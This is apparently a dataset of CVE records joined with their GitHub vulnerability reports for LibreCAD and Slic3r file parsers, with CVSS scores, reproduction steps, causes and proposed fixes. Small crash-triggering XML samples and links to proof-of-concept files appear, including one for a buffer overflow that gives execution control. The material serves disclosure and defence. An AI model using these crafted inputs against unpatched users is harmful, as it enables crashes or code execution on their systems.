Windows 10 (10.0)
Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataMoji)
https://api.github.com/repos/LibreCAD/LibreCAD/issues/1462/comments
5
2021-12-18T19:01:27Z
2022-01-25T12:03:26Z
https://github.com/LibreCAD/LibreCAD/issues/1462
1,083,924,119
1,462
3,096
CVE-2021-45342
2022-01-25T13:15:07.830
A buffer overflow vulnerability in CDataList of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreCAD/LibreCAD/issues/1464" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202305-26" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5077" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreCAD/LibreCAD/issues/1464" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202305-26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5077" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:librecad:librecad:*:*:*:*:*:*:*:*", "matchCriteriaId": "66E49DA1-2E98-4159-BCA0-DD5EAAEF049A", "versionEndExcluding": null, "versionEndIncluding": "2.1.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:librecad:librecad:2.2.0:alpha:*:*:*:*:*:*", "matchCriteriaId": "4C9E5468-D214-4130-BDAB-BE7721396A2F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "84591147-6A0D-4F5C-91F3-51DF9F64FCF5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "6B9DD625-CB16-4904-A4B0-7BA57A49531C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "79099DF5-DD78-4B2F-9B4A-A7FECBAF2AC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/LibreCAD/LibreCAD/issues/1464
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreCAD", "LibreCAD" ]
# Vulnerable Products * LibreCAD 2.2.0-rc3 and older ### Steps to reproduce or sample file 1. Start LibreCAD 2.2.0 in a debugger 2. File/Open... 3. Unzip and open the [attached proof-of-concept file](https://github.com/LibreCAD/LibreCAD/files/7740065/jww_cdatalist.zip) 4. Observe `ACCESS_VIOLATION` crash, with `eip=0x41414141` (AAAA) Screenshot: ![jww_cdatalist](https://user-images.githubusercontent.com/158607/146657420-8b1739a5-ce12-4748-b72d-108278ea5341.png) ### Cause The `CDataList` entity deserialization in `LibreCAD/libraries/jwwlib/src/jwwdoc.h` is vulnerable to a stack buffer overflow. `char buf[512]` declared in `CDataList::Serialize()` on [line 784](https://github.com/LibreCAD/LibreCAD/blob/768285653c46e734a75460928142cda1a33c2c53/libraries/jwwlib/src/jwwdoc.h#L784) is of fixed size 512. One variety of `CDataList` provides its own size field, as seen on [line 795](https://github.com/LibreCAD/LibreCAD/blob/768285653c46e734a75460928142cda1a33c2c53/libraries/jwwlib/src/jwwdoc.h#L795) and no bounds checking is performed. This allows an attacker to overflow `buf` and overwrite other stack variables, including the return address. The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present in older versions and on other platforms. **Note**: This is similar to, but distinct from issue #1462 ### Impact An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly). This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user. ### Proposed Mitigation 1. Perform bounds checking in `CDataList::Serialize()`, and refuse to load more data to `buf` than actually supported. 2. Enable stack smashing protection in the windows build of LibreCAD. ### Operating System and LibreCAD version info Version: 2.2.0-rc3 Compiler: GNU GCC 7.3.0 Compiled on: Nov 29 2021 Qt Version: 5.12.4 Boost Version: 1.65.1 System: Windows 10 (10.0)
Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataList)
https://api.github.com/repos/LibreCAD/LibreCAD/issues/1464/comments
2
2021-12-18T22:48:34Z
2022-01-25T12:09:59Z
https://github.com/LibreCAD/LibreCAD/issues/1464
1,083,960,819
1,464
3,097
CVE-2021-45343
2022-01-25T13:15:07.873
In LibreCAD 2.2.0, a NULL pointer dereference in the HATCH handling of libdxfrw allows an attacker to crash the application using a crafted DXF document.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreCAD/LibreCAD/issues/1468" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202305-26" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5077" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreCAD/LibreCAD/issues/1468" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202305-26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5077" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:librecad:librecad:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E51FA84F-21D7-4AFA-871C-488EF10C2092", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreCAD/LibreCAD/issues/1468
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreCAD", "LibreCAD" ]
### Steps to reproduce or sample file 1. Unzip and load the [attached proof of concept file](https://github.com/LibreCAD/LibreCAD/files/7741210/dxf_hatch93.zip) in LibreCAD 2.2.0-rc3 ### Cause The `std::shared_ptr` `DRW_Hatch::loop` is written to when loading a `HATCH` entity with code 93. If this occurs before a code 92, the pointer is still `NULL`, leading to a crash. ### Impact Denial of service. ### Proposed Mitigation Ensure that `DRW_Hatch::loop` is not NULL before dereferencing at `drw_entities.cpp:1808` ### Operating System and LibreCAD version info Version: 2.2.0-rc3 Compiler: GNU GCC 7.3.0 Compiled on: Nov 29 2021 Qt Version: 5.12.4 Boost Version: 1.65.1 System: Windows 10 (10.0)
NULL pointer dereference in DXF parser, HATCH code 93
https://api.github.com/repos/LibreCAD/LibreCAD/issues/1468/comments
2
2021-12-19T17:00:48Z
2022-01-25T12:25:06Z
https://github.com/LibreCAD/LibreCAD/issues/1468
1,084,144,167
1,468
3,098
CVE-2021-45846
2022-01-25T14:15:08.807
A flaw in the AMF parser of Slic3r libslic3r 1.3.0 allows an attacker to cause an application crash using a crafted AMF document, where a metadata tag lacks a "type" attribute.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5117" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5117" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slic3r:slic3r:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "A80F063E-875F-4590-B370-4A8795AF1F9F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/slic3r/Slic3r/issues/5117
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slic3r", "Slic3r" ]
### Summary A crafted AMF XML document can cause a crash due to a NULL pointer dereference during parsing. ### Vulnerable versions * Slic3r (commit b1a5500f427700ac3dffc0e7d9535ea65f993537) ### Step to reproduce 1. Create the proof-of-concept OBJ file (`nullptr_amf_metadata.amf.xml`): ``` <amf unit="millimeter"> <object id="0"> <metadata>dummy</metadata> </object> </amf> ``` 2. Execute `slic3r --info nullptr_amf_metadata.amf.xml` 3. Observe segmentation fault. ### Example file [nullptr_amf_metadata.amf.xml.zip](https://github.com/slic3r/Slic3r/files/7777329/nullptr_amf_metadata.amf.xml.zip) ### Cause An attempt is made to read the `type` attribute of the `<metadata>` tag, at [AMF.cpp:189](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/AMF.cpp#L189). The PoC contains a `metadata` tag without a `type` attribute. `get_attribute()` returns NULL, and thus the creation of the `std::string m_value[0]` crashes. ### Impact Denial of Service. ### Proposed mitigation Check for NULL before trying to construct the `std::string`, set a default value or reject the tag. Similar checks are already in place at [line 163](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/AMF.cpp#L163) and others.
NULL pointer dereference in AMF XML parser (metadata tag without type attribute)
https://api.github.com/repos/slic3r/Slic3r/issues/5117/comments
2
2021-12-26T17:21:29Z
2022-02-01T23:28:44Z
https://github.com/slic3r/Slic3r/issues/5117
1,088,812,181
5,117
3,099
CVE-2021-45847
2022-01-25T14:15:08.860
Several missing input validations in the 3MF parser component of Slic3r libslic3r 1.3.0 can each allow an attacker to cause an application crash using a crafted 3MF input file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5118" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5119" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5120" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5118" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5119" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5120" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slic3r:slic3r:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "A80F063E-875F-4590-B370-4A8795AF1F9F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/slic3r/Slic3r/issues/5118
[ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "slic3r", "Slic3r" ]
### Summary A crafted 3MF XML document can cause a crash due to a NULL pointer dereference during parsing. ### Vulnerable versions * Slic3r (commit b1a5500f427700ac3dffc0e7d9535ea65f993537) ### Step to reproduce 1. Create the proof-of-concept OBJ file (`3dmodel.3dmodel`): ```xml <model> <resources> <object id="1"> <mesh> <vertices> <vertex /> </vertices> </mesh> </object> </resources> </model> ``` 2. Pack the file into a zip archive together with the prerequisite other files from a 3mf file: ``` 3D/3dmodel.3dmodel rels/.rels [Content_Types].xml ``` 3. Rename the zip archive to `nullptr_3mf_vertex.3mf` 4. Execute `slic3r --info nullptr_3mf_vertex.3mf` 5. Observe segmentation fault. ### Example file [nullptr_3mf_vertex.zip](https://github.com/slic3r/Slic3r/files/7777535/nullptr_3mf_vertex.zip) ### Cause `get_attribute()` in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at [TMF.cpp:580](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/TMF.cpp#L580) is ineffective, since `self->stop()` does not terminate the current function. Execution continues to line 582, where `atof` receives a NULL pointer input, and a crash results. ### Impact Denial of Service. ### Proposed mitigation Throw an exception in `TMFParserContext::stop()` to ensure that file parsing stops immediately.
NULL pointer dereference in 3MF XML parser (vertex tag without x/y/z attribute)
https://api.github.com/repos/slic3r/Slic3r/issues/5118/comments
2
2021-12-26T20:32:19Z
2022-01-31T12:44:25Z
https://github.com/slic3r/Slic3r/issues/5118
1,088,840,391
5,118
3,100
CVE-2021-45847
2022-01-25T14:15:08.860
Several missing input validations in the 3MF parser component of Slic3r libslic3r 1.3.0 can each allow an attacker to cause an application crash using a crafted 3MF input file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5118" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5119" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5120" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5118" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5119" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5120" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slic3r:slic3r:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "A80F063E-875F-4590-B370-4A8795AF1F9F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/slic3r/Slic3r/issues/5119
[ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "slic3r", "Slic3r" ]
### Summary A crafted 3MF XML document can cause a crash due to a NULL pointer dereference during parsing. ### Vulnerable versions * Slic3r (commit b1a5500f427700ac3dffc0e7d9535ea65f993537) ### Step to reproduce 1. Create the proof-of-concept OBJ file (`3dmodel.3dmodel`): ```xml <model> <resources> <object id="1"> <mesh> <vertices> <triangle /> </vertices> </mesh> </object> </resources> </model> ``` 2. Pack the file into a zip archive together with the prerequisite other files from a 3mf file: ``` 3D/3dmodel.3dmodel rels/.rels [Content_Types].xml ``` 3. Rename the zip archive to `nullptr_3mf_triangle.3mf` 4. Execute `slic3r --info nullptr_3mf_triangle.3mf` 5. Observe segmentation fault. ### Example file [nullptr_3mf_triangle.zip](https://github.com/slic3r/Slic3r/files/7777538/nullptr_3mf_triangle.zip) ### Cause `get_attribute()` in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at [TMF.cpp:590](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/TMF.cpp#L590) is ineffective, since `self->stop()` does not terminate the current function. Execution continues to line 593, where `atoi` receives a NULL pointer input, and a crash results. ### Impact Denial of Service. ### Proposed mitigation Throw an exception in `TMFParserContext::stop()` to ensure that file parsing stops immediately.
NULL pointer dereference in 3MF XML parser (triangle tag without v1/v2/v3 attribute)
https://api.github.com/repos/slic3r/Slic3r/issues/5119/comments
2
2021-12-26T20:37:00Z
2022-01-31T12:45:37Z
https://github.com/slic3r/Slic3r/issues/5119
1,088,840,946
5,119
3,101
CVE-2021-45847
2022-01-25T14:15:08.860
Several missing input validations in the 3MF parser component of Slic3r libslic3r 1.3.0 can each allow an attacker to cause an application crash using a crafted 3MF input file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5118" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5119" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5120" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5118" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5119" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/slic3r/Slic3r/issues/5120" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slic3r:slic3r:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "A80F063E-875F-4590-B370-4A8795AF1F9F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/slic3r/Slic3r/issues/5120
